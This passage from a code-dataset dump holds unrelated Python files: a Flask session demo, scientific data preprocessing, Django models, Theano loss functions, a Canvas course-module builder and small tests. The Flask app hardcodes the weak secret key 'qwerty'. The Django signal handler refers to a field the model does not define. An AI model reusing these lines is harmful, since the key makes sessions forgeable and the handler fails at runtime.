than\r\n # simulating\r\n for i in range(SIMULATION_FRAMES_PER_DRAW):\r\n update(1/(fps * SIMULATION_FRAMES_PER_DRAW))\r\n\r\n else:\r\n # SLOWDOWN can be set to true in order to observe the\r\n # in extreme slow_motion. How many fps with SLOWDOWN\r\n # enabled can be set with SLOWDOWN_FPS\r\n time.sleep((1/SLOWDOWN_FPS) - (1/100))\r\n update(1/100)\r\n\r\n # 3. Draw (visualization)\r\n draw(game, player_1, player_2)\r\n","sub_path":"lecture_versions/v3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"65718401","text":"from flask import Flask, redirect, session, url_for, request\n\napp = Flask(__name__)\napp.secret_key = 'qwerty'\n\n@app.route('/')\ndef inicio():\n if 'usuario' in session:\n nombre = session['usuario']\n return \"usted está logeado como %s \" % nombre\n else:\n return \"usted no está logeado, dirigirse a login\"\n\n@app.route('/login')\ndef login():\n session['usuario'] = 'alejandro'\n return redirect(url_for('inicio'))\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"flask/sesion.py","file_name":"sesion.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"317873332","text":"\n# process sediment values from all positions from all time, into a big dataframe.\n# each column represents a position in satellite image, over time\n\nimport os\nimport glob\nimport pandas as pd\nfrom netCDF4 import Dataset\nimport numpy as np\n\nroot_dir = '/data/results/batch_run'\ndef read_data(root_dir, variable = 'spm_nechad2016', nlats = 2946, nlons = 2718):\n \"\"\"\n Summary line.\n Extended description of function.\n Parameters\n ----------\n root_dir : str\n Starting point to locate the folder of the result files, each folder represents the date of satellite image\n variable : str\n Variable name specifying the algorithm used: spm_nechad2016, t_nechad2016, t_dogliotti, fai.\n The default is spm_nechad2016\n nlats : int\n Dimension of the longitudes, for the default the original value of 2946 is used.\n nlons : int\n Dimension of the latitudes, for the default the original value of 2718 is used.\n Returns\n -------\n df : DataFrame\n A dataframe with date and sediment values as columns. Each non-date column represents sediment in a location. \n Dates are a list of date strings with format Y%-m%-%d.\n Non-date columns contain the result for the given algorithm for each pixel/location,\n dimensions are nlats * nlon\n \"\"\"\n \n df = pd.DataFrame()\n for folder_name in os.listdir(root_dir):\n product_path = glob.glob(root_dir + '/' + folder_name + '/*L2W.nc')\n if '-' in folder_name: \n for file_name in product_path:\n nc = Dataset(file_name) \n data_temp = nc.variables[variable][:]\n data = data_temp.flatten('C') # flatten to a 1D array\n data_split = np.ma.hsplit(data, 1) # split into multiple array\n df_temp = pd.DataFrame(data_split)\n df_temp['date'] = folder_name\n df = pd.concat([df, df_temp])\n return df\n\n#df.to_csv('pd_all_sediment.csv', index=False) \n\n\n","sub_path":"data-preprocessing/sediment_all_positions.py","file_name":"sediment_all_positions.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"171792300","text":"# File for writing tests\nfrom frontend import cos_sim\n\ndef test_cos_sim():\n v1 = {'hitler' : 10}\n v2 = {'hitler' : 3}\n assert cos_sim(v1, v2) == 1.0\n\n v1 = {'hitler' : 1, 'nazi' : 1}\n v2 = {'banana' : 1, 'nazi' : 1}\n assert round(cos_sim(v1, v2), 2) == 0.5\n\n v1 = {}\n v2 = {'foo' : 30}\n assert cos_sim(v1, v2) == 0.0\n\nif __name__ == '__main__':\n test_cos_sim()\n","sub_path":"frontend/test_frontend.py","file_name":"test_frontend.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"392136693","text":"# class file for an Entity\n\n\nclass Entity:\n # class file for an Entity\n def __init__(self, position=None, glyph=None, renderable=False, movement=None, player_input=None, blocking=False):\n # initialization for self and components\n self.position = position\n self.glyph = glyph\n self.renderable = renderable\n self.movement = movement\n self.player_input = player_input\n self.blocking = blocking\n","sub_path":"Entity.py","file_name":"Entity.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"478164493","text":"##method-1\n\nimport qrcode\nqr=qrcode.make(\"how is it going\")\nqr.save(\"sample.png\")\n\n##method-2\n\nqr=qrcode.QRCode(version=1,box_size=15,border=2)\ndata=(\"www.google.com\")\nqr.add_data(data)\nqr.make(fit=True)\nimg=qr.make_image(fill='red',back_color='black')\nimg.save(\"col.png\")\n","sub_path":"Auto_Scripts/QR.py","file_name":"QR.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"160107317","text":"import canvasapi\nimport click\n\nfrom team_formation import config\nfrom team_formation.prompts import course_prompt\nfrom module_tools import quiz\nfrom module_tools import page\n\n@click.command()\n@click.option('--course_id',\n help='Canvas Course ID.',\n type=int,\n envvar='CANVAS_COURSE_ID')\n@click.option('--token',\n prompt=False,\n default=config.TOKEN,\n hide_input=True,\n help='Canvas API token.',\n required=True,\n envvar='CANVAS_API_TOKEN')\n@click.option('--url',\n # default='https://canvas.ubc.ca',\n default='https://ubc.test.instructure.com',\n # help='Canvas Url. [default: https://canvas.ubc.ca]',\n help='Canvas Url. [default: https://ubc.test.instructure.com]',\n required=True,\n envvar='CANVAS_BASE_URL')\n@click.option('--location',\n help='File Folder containing module content',\n prompt=True,\n required=True)\n\n\ndef create_module(url, token, course_id, location):\n canvas = canvasapi.Canvas(url, token)\n\n if not course_id:\n # prompt user to select a course they have access to (paginated)\n course_id = course_prompt(canvas)\n\n course = canvas.get_course(course_id)\n module = course.create_module(module={'name':'test module'})\n # create learning outcomes\n lo = page.create_page(course, \"Learning Outcomes\", location+'/Learning Outcomes.txt')\n # create pre-test\n # pret = course.create_quiz(quiz={'title':'pre-test'})\n pret = quiz.create_quiz(course, 'Pre-Test', loc=location+'/Quizformat.txt')\n # create post-test\n # postt = course.create_quiz(quiz={'title':'post-test'})\n postt = quiz.create_quiz(course, 'Post-Test', loc=location+'/Quizformat.txt')\n # create readings\n rea = page.create_page(course, 'Readings', loc=location+'/Readings.txt')\n # add videos\n #\n #add slides\n\n module.create_module_item(module_item={'title':'Learning Outcomes', 'type':'Page', \\\n 'content_id':None, 'page_url':lo})\n module.create_module_item(module_item={'title':'Pre-Test', 'type':'Quiz', \\\n 'content_id':pret})\n module.create_module_item(module_item={'title':'Post-Test', 'type':'Quiz', \\\n 'content_id':postt})\n module.create_module_item(module_item={'title':'Readings', 'type':'Page', \\\n 'content_id':None, 'page_url':rea})\n\nif __name__ == '__main__':\n create_module()","sub_path":"create_module.py","file_name":"create_module.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"622593799","text":"import os\nimport json\n\ndef combine_jupyter_notebooks(notebooks_to_merge, combined_file_name):\n '''\n Combines multiple jupyter notebooks into one\n \n parameters:\n notebooks_to_merge (list): an ordered list of your .ipynb files to merge\n combined_file_name (string): name of the combined .ipynb file which will be generated.\n \n '''\n with open(notebooks_to_merge[0], mode='r', encoding='utf-8') as f:\n a = json.load(f)\n \n for notebook in notebooks_to_merge[1:]:\n with open(notebook, mode='r', encoding='utf-8') as f:\n b = json.load(f)\n a['cells'].extend(b['cells'])\n # extend here not append so that each dictionary in b['cells']\n # is added to new dictionary in a['cells']\n \n with open(combined_file_name, mode='w', encoding='utf-8') as f:\n json.dump(a, f)\n","sub_path":"age_predict/age_predict/Combine_jupyter_notebooks.py","file_name":"Combine_jupyter_notebooks.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"544872979","text":"from django.db import models\nfrom django.core.validators import MaxValueValidator, MinValueValidator\n\nfrom django.db.models.signals import post_delete, pre_delete, post_save, pre_save\nfrom django.db.models.signals import post_migrate, pre_migrate, post_init, pre_init\n\nfrom django.dispatch import receiver\n\nfrom django.utils.safestring import mark_safe\n\nimport datetime\n\n# Create your models here.\n\n# Fields which are common\n# null = Default False\n# blank = Default False\n# verbose_name = No Default\n# default = need to set\n# validators = no default\n\nclass UserProfile(models.Model):\n fullname = models.CharField(\n max_length=30, # This is must\n # null=True,\n # blank=True,\n )\n active = models.BooleanField(\n default=True,\n )\n added_on = models.DateTimeField(\n auto_now_add=True,\n )\n lastupdate = models.DateTimeField(\n auto_now=True,\n )\n\n birthdate = models.DateField()\n\n login_time = models.TimeField()\n\n balance = models.DecimalField(\n max_digits=20,\n decimal_places=2,\n default = 0.0,\n validators = [\n MinValueValidator(0)\n ]\n )\n\n tax = models.DecimalField(\n max_digits=10,\n decimal_places=2,\n default = 0.0,\n validators = [\n MinValueValidator(0),\n MaxValueValidator(100),\n ]\n )\n\n logincount = models.IntegerField(\n default=0,\n )\n\n email = models.EmailField()\n\n gender = models.CharField(\n max_length = 2,\n choices = (\n (\"M\", \"Male\"),\n (\"F\", \"Female\"),\n ),\n default=\"M\",\n )\n\n @property\n def age(self, *args, **kwargs):\n return datetime.datetime.now().date() - self.birthdate\n\n @property\n def gotoGoogle(self, *args, **kwargs):\n return mark_safe(\"\"\" Go to Google \"\"\")\n def __str__(self, *args, **kwargs):\n return self.fullname\n\nclass Address(models.Model):\n address = models.TextField()\n\n profile = models.ForeignKey(\n 'profiles.UserProfile',\n on_delete = models.CASCADE,\n related_name=\"address\",\n )\n\nclass Relation(models.Model):\n to_rel = models.ForeignKey(\n 'profiles.UserProfile',\n on_delete = models.CASCADE,\n related_name=\"relation_with\",\n )\n from_rel = models.ForeignKey(\n 'profiles.UserProfile',\n on_delete = models.CASCADE,\n related_name=\"my_relation\",\n )\n relationdd = models.CharField(\n max_length = 2,\n choices = (\n (\"MO\", \"Mother\"),\n (\"FA\", \"Father\"),\n (\"SI\", \"Sister\"),\n (\"BR\", \"Brother\"),\n (\"DA\", \"Daughter\"),\n (\"SO\", \"Son\"),\n )\n )\n\nreverse_relation = {\n \"FA\" : { \"M\": \"SO\", \"F\":\"DA\"},\n \"MO\" : { \"M\": \"SO\", \"F\":\"DA\"},\n \"SI\" : { \"M\": \"BR\", \"F\": \"SI\" },\n \"BR\" : { \"M\": \"BR\", \"F\": \"SI\" },\n \"DA\" : { \"M\": \"FA\", \"F\": \"MO\"},\n \"SO\" : { \"M\": \"FA\", \"F\": \"MO\"},\n}\n\n@receiver(post_save, sender=Relation)\n@receiver(post_save, sender=UserProfile)\ndef demoPostSave(sender, instance, *args, **kwargs):\n print (\"IN POST SAVE THROUGH : \" + str(sender))\n\n@receiver(post_save, sender=Relation)\ndef CreateReverseRelation(sender, instance, *args, **kwargs):\n # kwargs['created'] = True\n print (\"IN THIS \")\n if kwargs['created']:\n print (\"2\")\n try: \n Relation.objects.get(\n to_rel = instance.from_rel,\n from_rel = instance.to_rel,\n relation = reverse_relation[instance.relation][instance.from_rel.gender],\n )\n except models.ObjectDoesNotExist as e:\n Relation.objects.create(\n from_rel = instance.to_rel,\n to_rel = instance.from_rel,\n relation = reverse_relation[instance.relation][instance.from_rel.gender]\n )","sub_path":"profiles/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"18468077","text":"from django import forms\nfrom django.forms import ModelForm\nfrom models import Team\n\nclass TeamForm(ModelForm):\n\n class Meta:\n model = Team\n\n def clean(self):\n data = self.cleaned_data\n if data['rerolls'] == None:\n data['rerolls'] = 0\n\n if data['fan_factor'] == None:\n data['fan_factor'] = 0\n\n if data['assistant_coaches'] == None:\n data['assistant_coaches'] = 0\n\n if data['cheerleaders'] == None:\n data['cheerleaders'] = 0\n\n if data['apothecary'] == None:\n data['apothecary'] = 0\n\n # Always return the cleaned data, whether you have changed it or\n # not.\n return data\n","sub_path":"testproject/bloodbench/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"242951194","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pickle\n\nf = open('dt_Tcool_Thot.txt','rb')\nparameters = pickle.load(f)\nf.close\n\ndt = parameters[0]\nTcool = parameters[1]\nThot = parameters[2]\nmfig = parameters[3] \nprint(mfig)\n\nfig = plt.figure()\nfor fignum in range(1,len(mfig)+1): # [ )\n m = mfig[fignum-1]\n print(m, fignum)\n ax = fig.add_subplot(220 + fignum) #may modify\n f = open('result'+str(fignum)+'.txt','rb')\n u = pickle.load(f)\n f.close\n im = ax.imshow(u.copy(), cmap=plt.get_cmap('rainbow'), vmin=Tcool,vmax=Thot)\n ax.set_axis_off() \n ax.set_title('{:.1f} ms'.format(m*dt*1000))\n\nfig.subplots_adjust(right=0.85)\ncbar_ax = fig.add_axes([0.9, 0.15, 0.03, 0.7])\ncbar_ax.set_xlabel('$T$ / K', labelpad=20)\nfig.colorbar(im, cax=cbar_ax)\nplt.show()","sub_path":"heatResults_serial/plotcoolwarm.py","file_name":"plotcoolwarm.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"499451879","text":"# Numerical Analysis (Math 328) at the City College of New York, CUNY\n# Exercise Set 2.3\n# Date: Sep/15/2015\n# Author: Minwoo Bae\n# Problem 07 - d): \n# Use the Secant method to find solutions accurate to within 10^-4 for \n# the following problems : x - 0.8 - 0.2*sin(x) = 0, [0, pi/2]\nimport math\nfrom sympy import *\n\ndef f(x):\n\treturn x - 0.8 - 0.2*math.sin(x)\n\ndef secantMethod(p_0, p_1, tol, num):\n\ti = 2\n\twhile i <= num:\n\t\tp = p_1 - (f(p_1)*(p_1 - p_0))/((f(p_1) - f(p_0)))\n\t\tif math.fabs(p - p_1) < tol:\n\t\t\treturn [p, i]\n\t\t\tbreak\n\t\ti+=1\n\t\tp_0 = p_1\n\t\tp_1 = p\n\n\tprint('The method failed after N_0 iterations, N_0 = '+str(num))\n\nprint('Enter tolerance: ')\ntol = float(input())\nprint('Enter maximum number of iterations N_0: ')\nnum = int(input())\nprint(secantMethod(0, math.pi/2, tol, num))","sub_path":"ex0203_07.py","file_name":"ex0203_07.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"332496387","text":"#Student_name: Harwinddranath Muralitheran\n#Student_ID: 22254937\n#CITS2401 - Lab_2_Part_4\n\n\ndef honeybee(h0,f0,L,w,m,n):\n \n parameters = [h0,f0,L,w,m,n]\n \n for i in range(len(parameters)):\n if parameters[i] < 0:\n print(\"Please enter positive integers only.\")\n return \n \n h_list = [round(h0)]\n f_list = [round(f0)]\n \n for ii in range(1,n+1):\n N = h_list[-1] + f_list[-1]\n h = round(h_list[-1] + L * (N / (w + N)) - h_list[-1] * (0.25 - 0.75 * (f_list[-1] / (N + 0.001))))\n if h < 0:\n h = 0\n f = round(f_list[-1] + h_list[-1] * (0.25 - 0.75 * (f_list[-1] / (N + 0.001))) - m * f_list[-1])\n if f < 0:\n f_list.append(0)\n else:\n f = round(f,0)\n f_list.append(int(f))\n h_list.append(h)\n H_max = max(h_list)\n F_max = max(f_list)\n \n return (h_list, f_list, H_max, F_max)","sub_path":"Muralitheran_22254937.py","file_name":"Muralitheran_22254937.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"2587886","text":"import logging\nimport os\n\nfrom crawling import Crawler\nfrom slack_bot import SlackBot\n\nslack_channel = os.getenv('SLACK_CHANNEL')\nslack_token = os.getenv('SLACK_TOKEN')\n\nif slack_channel is None:\n raise Exception('Expected to find slack channel at environment variable \\\n SLACK_CHANNEL, found nothing')\nif slack_token is None:\n raise Exception('Expected to find slack token at environment variable \\\n SLACK_TOKEN, found nothing')\n\n\ndef handler(event, context):\n crawler = Crawler()\n crawler.load_phantom(os.path.join(os.getcwd(),\n 'bin',\n 'phantomjs'))\n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n\n logger.info(\"Event: \" + str(event))\n posts = crawler.crawling()\n text = \"\\n\".join(map(str, posts))\n logger.info(\"Message: \" + text)\n\n if posts:\n bot = SlackBot(slack_token, slack_channel)\n a = bot.send_message(text)\n\n return a\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"438591544","text":"import argparse\nimport math\nimport logging\nimport tensorflow as tf\nfrom inhousednn.task.filtering.loader import FilteringLoader\nfrom inhousednn.layer.bert.bert import BERT, BERTEmbedding\nfrom inhousednn.layer.attention import MultiHeadAttention, Transformer\nfrom inhousednn.layer.layer_normalization import LayerNormalization\nfrom inhousednn.layer.cnn import MultiKernelConv2d\n\nlogger = logging.getLogger()\nlogging.basicConfig(format='%(asctime)s: %(levelname)s: %(message)s',\n datefmt='%m/%d/%Y %H:%M:%S')\nlogging.root.setLevel(level=logging.INFO)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--eval\", required=True,\n help=\"Eval set location\"\n )\n parser.add_argument(\n \"--model_path\", required=True,\n help=\"hdf5 model path\"\n )\n parser.add_argument(\n \"--gpu_num\", default=\"1\",\n type=int, help=\"default is 1.\"\n )\n parser.add_argument(\n \"--batch_size\", default=20,\n type=int, help=\"batch size\"\n )\n args = parser.parse_args()\n\n with tf.device('/cpu:0'):\n model = tf.keras.models.load_model(args.model_path,\n custom_objects={\n 'BERT': BERT,\n 'BERTEmbedding': BERTEmbedding,\n 'MultiHeadAttention': MultiHeadAttention,\n 'Transformer': Transformer,\n 'LayerNormalization': LayerNormalization,\n 'MultiKernelConv2d': MultiKernelConv2d\n })\n\n # configure multi gpus\n model = tf.keras.utils.multi_gpu_model(model, gpus=2)\n\n # data pipeline\n dataset_loader = FilteringLoader(\n bert_tokenizer_vocab='/nas/data/m2/zhangb8/data/bert/multi_cased_L-12_H-768_A-12',\n max_seq_len=128,\n is_train=True,\n pairwise=False,\n cache_size=50000\n )\n test_dataset = dataset_loader.load(args.eval)\n test_dataset_len = dataset_loader.num_instance(args.eval)\n logger.info('test data length: %d' % test_dataset_len)\n\n # compile model\n optimizer = tf.keras.optimizers.SGD(\n lr=0.001, decay=1e-6, momentum=0.9, nesterov=True, clipnorm=1.\n )\n model.compile(loss='categorical_crossentropy',\n optimizer=optimizer,\n metrics=['accuracy'])\n model.evaluate(x=test_dataset,\n steps=math.ceil(test_dataset_len/args.batch_size),\n verbose=1)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"inhousednn/task/filtering/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"493169871","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 21 11:01:10 2016\n\n@author: dev-h3\n\"\"\"\nimport math\nclass SegmentSumTreeNode:\n def __init__(self, start, end, sumval):\n self.start, self.end, self.sum = start, end, sumval\n self.left, self.right = None, None\n\nclass Solution:\t\n root = None\n # @param A: An integer list\n def __init__(self, A):\n # write your code here\n self.root = self.buildSumSegmentTreeFromList(A,0,len(A)-1)\n \n def buildSumSegmentTreeFromList(self, A, start, end):\n if start > end:\n return None\n \n root = SegmentSumTreeNode(start, end, sum(A[start:end+1]))\n if start < end:\n root.left = self.buildSumSegmentTreeFromList(A, start, int(math.floor((start + end)/2)))\n root.right = self.buildSumSegmentTreeFromList(A, int(math.floor((start + end)/2))+1, end) \n return root\n\n def query(self, start, end):\n # write your code here\n return self.querySum(self.root, start, end)\n \n def querySum(self, root, start, end):\n if start > end:\n return 0\n if start > root.end or end < root.start:\n return 0\n if root.start >= start and root.end <= end:\n return root.sum\n \n return self.querySum(root.left, start, end)+self.querySum(root.right, start, end) \n \n # @param index, value: modify A[index] to value.\n def modify(self, index, value):\n # write your code here\n return self.modifySum(self.root, index, value)\n\n def modifySum(self, root, index, value):\n if index < root.start or index > root.end:\n return\n \n #if we get the node, we set the max value\n if root.start == root.end and index == root.start:\n root.sum=value\n return\n \n #If index is in the left tree range\n if index >= root.left.start and index <= root.left.end:\n self.modifySum(root.left, index, value)\n else:\n self.modifySum(root.right, index, value)\n root.sum = root.right.sum+root.left.sum \n \nsln = Solution([1,2,7,8,5])\nprint(sln.query(0,2))\nsln.modify(0,4)\nprint(sln.query(0,1))\nsln.modify(2,1)\nprint(sln.query(2,4))\n\n\n\n\n\n\n\n\n\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"589412248","text":"\"\"\"\npython -m unittest tests.test_powerpool\npython -m unittest tests.test_powerpool.TestSchedule.test__check_periodicity -v\n\nmake sure that home-assitant/tests/common.py is linked\n\"\"\"\nimport os\nimport sys\nfrom unittest import TestCase\n\nfrom homeassistant.helpers.entity_component import EntityComponent\nfrom homeassistant.setup import setup_component\n\nfrom tests.common import get_test_home_assistant\n\nfrom helper import fmt_print, rm_entity_from_entity_state\n\nfrom config.custom_components.energy_asset import EnergyAsset\nfrom config.custom_components.helper import dbg\nfrom config.custom_components.powerpool import PowerPool, DOMAIN, SCAN_INTERVAL, GROUP_NAME_ALL_PP_ASSETS\n\nimport logging\n\nfrom config.custom_components.pp_const import ENERGY_ASSET_DOMAIN, EVENT_ENERGY_ASSET_CREATED\n\n_LOGGER = logging.getLogger(__name__)\nlog_fmt = r'%(asctime)-15s %(levelname)s %(name)s %(funcName)s:%(lineno)d %(message)s'\nlogging.basicConfig(format=log_fmt, level=logging.DEBUG)\n\n\nclass Test_PowerPool(TestCase):\n def setUp(self):\n \"\"\"Setup things to be run when tests are started.\"\"\"\n self.hass = get_test_home_assistant()\n\n component = EntityComponent(_LOGGER, DOMAIN, self.hass, SCAN_INTERVAL, GROUP_NAME_ALL_PP_ASSETS)\n\n\n pp_name = 'xxx'\n config = {\n \"icon\": \"mdi:cancel\",\n }\n self.pp = PowerPool(self.hass, name=pp_name, config=config)\n\n component.add_entities([self.pp], update_before_add=True)\n\n self.asset1 = EnergyAsset(name='asset1',\n lat=10,\n lon=90,\n schedule=[1, 2, 3, 4, 5],\n max_flex=[1, 1, 1, 1, 1],\n min_flex=[1, 1, 1, 1, 1],\n powerpool=pp_name,\n hass=self.hass,\n status='installed'\n )\n self.hass.states.set(f\"{ENERGY_ASSET_DOMAIN}.asset1\", pp_name, self.asset1.state_attributes)\n\n self.asset2 = EnergyAsset(name='asset2',\n lat=11,\n lon=99,\n schedule=[11, 22, 33, 44, 55],\n max_flex=[1.1, 1.1, 1.1, 1.1, 1.1],\n min_flex=[1.1, 1.1, 1.1, 1.1, 1.1],\n powerpool=pp_name,\n hass=self.hass,\n status='installed'\n )\n self.hass.states.set(f\"{ENERGY_ASSET_DOMAIN}.asset2\", pp_name, self.asset2.state_attributes)\n\n def tearDown(self):\n \"\"\"Stop everything that was started.\"\"\"\n # remove all listeners\n for l in self.pp.listeners:\n _LOGGER.info(f\"{dbg()}: unregister listener: {l}\")\n l()\n\n self.hass.stop()\n\n\n def test__aggregate(self):\n self.pp._add_asset(f\"{ENERGY_ASSET_DOMAIN}.asset1\")\n self.pp._add_asset(f\"{ENERGY_ASSET_DOMAIN}.asset2\")\n self.pp.aggregate_schedule(None)\n\n self.assertListEqual(self.pp.aggregated_schedule, [12.0, 24.0, 36.0, 48.0, 60.0])\n self.assertListEqual(self.pp.aggregated_min_flex, [2.1, 2.1, 2.1, 2.1, 2.1])\n self.assertListEqual(self.pp.aggregated_max_flex, [2.1, 2.1, 2.1, 2.1, 2.1])\n\n def test_evt_energy_asset_created(self):\n self.pp.listeners = [\n self.hass.bus.listen(EVENT_ENERGY_ASSET_CREATED, self.pp.evt_energy_asset_created),\n ]\n self.hass.bus.fire(EVENT_ENERGY_ASSET_CREATED, {\"entity_id\": f\"{ENERGY_ASSET_DOMAIN}.asset1\"})\n self.hass.block_till_done()\n\n self.assertTrue(self.pp.assets.get('asset1', False))\n\n","sub_path":"config/custom_components/tests/test_powerpool.py","file_name":"test_powerpool.py","file_ext":"py","file_size_in_byte":3696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"478127596","text":"import numpy as np\nfrom sklearn.metrics import precision_recall_curve, recall_score, auc\n\ndef epsilonInsensitiveLoss(y_true, y_pred, epsilon=1.0):\n\t# Compute the epsilon-insensitive loss\n\timport keras.backend.theano_backend as K\n\tlossList = K.maximum(K.abs(y_true - y_pred) - epsilon, 0.)\n\treturn K.mean(lossList)\n\t\ndef reweightedCrossentropyLoss(y_true, y_pred):\n\t# Compute the re-weighted cross-entropy loss, where everything with label -1 is weighted to 0\n\timport keras.backend.theano_backend as K\n\timport theano.tensor as T\n\tnonAmbig = (y_true > -0.5)\n\tcnts = nonAmbig.sum(axis=0, keepdims=True)*1.0\n\tassert (T.gt(cnts, 0.0))\n\treturn K.mean(K.binary_crossentropy(y_pred*nonAmbig, y_true*nonAmbig)*y_true.shape[0]*1.0/cnts, axis=-1)\n\t\ndef taskweightedCrossentropyLoss(y_true, y_pred):\n\t# Compute the task-weighted cross-entropy loss, where every task is weighted by 1 - (fraction of non-ambiguous examples that are positive)\n\t# In addition, weight everything with label -1 to 0\n\timport keras.backend.theano_backend as K\n\timport theano.tensor as T\n\tnonAmbig = (y_true > -0.5)\n\tcnts = nonAmbig.sum(axis=0, keepdims=True)*1.0\n\tassert (T.gt(cnts, 0.0)) # Prevents division by 0\n\tpos = (y_true > 0.5)\n\tposCntsPerTask = pos.sum(axis=0, keepdims=True)*1.0\n\tassert (T.gt(posCntsPerTask, 0.0)) # Ensures that all tasks have at least 1 positive example\n\tweightsPerTask = 1.0 - (posCntsPerTask/cnts)\n\tweightsPerTaskRep = T.extra_ops.repeat(weightsPerTask, y_true.shape[0], axis=0)\n\tnonAmbigTimesWeightsPerTask = nonAmbig * weightsPerTaskRep\n\tnormConst = nonAmbigTimesWeightsPerTask.sum(axis=0, keepdims=True).sum(axis=1)*1.0\n\tassert (T.gt(normConst, 0.0)) # Prevents division by 0\n\treturn K.mean(K.binary_crossentropy(y_pred*nonAmbigTimesWeightsPerTask, y_true*nonAmbigTimesWeightsPerTask)*y_true.shape[0]*y_true.shape[1]*1.0/normConst, axis=-1)\n\n# Compute the logistic loss for a single element\ndef elementLogisiticLoss(label, prediction):\n\tnegLogisticLoss = (label*np.log(prediction)) + ((1 - label) * np.log(1 - prediction))\n\treturn -negLogisticLoss\n\n# Compute the specificity\ndef negativeAccuracy(labels, predictedLabels):\n\tlabelsReverse = 1 - labels\n\tpredictedLabelsReverse = 1 - predictedLabels\n\treturn recall_score(labelsReverse, predictedLabelsReverse)\n\t\n# Get the AUPRC\ndef auPRC(y_true, y_score):\n\tprecision, recall, thresholds = precision_recall_curve(y_true, y_score)\n\treturn auc(recall, precision)\n\n# Get the recall at a specific FDR\ndef recallAtFdr(y_true, y_score, fdr_cutoff=0.05, returnCurve=False):\n\tprecision, recall, thresholds = precision_recall_curve(y_true, y_score)\n\tprecisionCutoff = 1 - fdr_cutoff\n\tcutoffIndex = 0\n\tfor i in range(len(precision)):\n\t\tif precision[i] >= precisionCutoff:\n\t\t\t# At the precision cutoff\n\t\t\tcutoffIndex = i\n\t\t\tbreak\n\tif returnCurve:\n\t\t# Return the PR curve in addition to the recall at the desired FDR\n\t\treturn [recall[cutoffIndex], precision, recall]\n\treturn recall[cutoffIndex]\n","sub_path":"evaluationScriptsCortexLiverModels/MLOperations.py","file_name":"MLOperations.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"512149615","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 24 14:57:49 2014\n\n@author: Flora Vincent\n\"\"\"\nimport itertools\nimport is_prime\n\nfor i in itertools.count(100000000):\n prime = is_prime.is_prime(i)\n if prime is True:\n print(i)\n break\n","sub_path":"exercices/230/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"149230372","text":"from dircheck import dircheck\nimport sys\nimport os\nimport unittest\nimport tempfile\nimport shutil\n\ntest_dir = 'test-dir-123123'\n\nclass TestDircheck(unittest.TestCase):\n def runDircheck(self, *args):\n sys.argv = ['dircheck'] + list(args)\n dircheck.Main()\n \n def assertSysExits(self, *args):\n with self.assertRaises(SystemExit) as cm:\n self.runDircheck(*args)\n self.assertEqual(cm.exception.code, 1)\n \n def setUp(self):\n if os.path.exists(test_dir):\n shutil.rmtree(test_dir)\n os.mkdir(test_dir)\n os.chdir(test_dir)\n for i in range(10):\n os.system('echo {} > testfile-{}.txt'.format('%'*i*10, i))\n os.mkdir('testdir-{}'.format(i))\n os.system('echo test > testdir-{}/test.txt'.format(i))\n self.runDircheck('hash', '.')\n\n def test_no_cuange(self):\n self.runDircheck('check', '.')\n\n def test_new_file(self):\n os.system('touch test.txt')\n self.assertSysExits('check', '.')\n\n def test_change_file(self):\n os.system('echo testmore > testdir-0/test.txt')\n self.assertSysExits('check', '.')\n\n def test_change_file_2(self):\n os.system('rm testdir-2/test.txt')\n os.system('mkdir testdir-2/test.txt')\n self.assertSysExits('check', '.')\n\n def test_change_mtime(self):\n os.system('touch 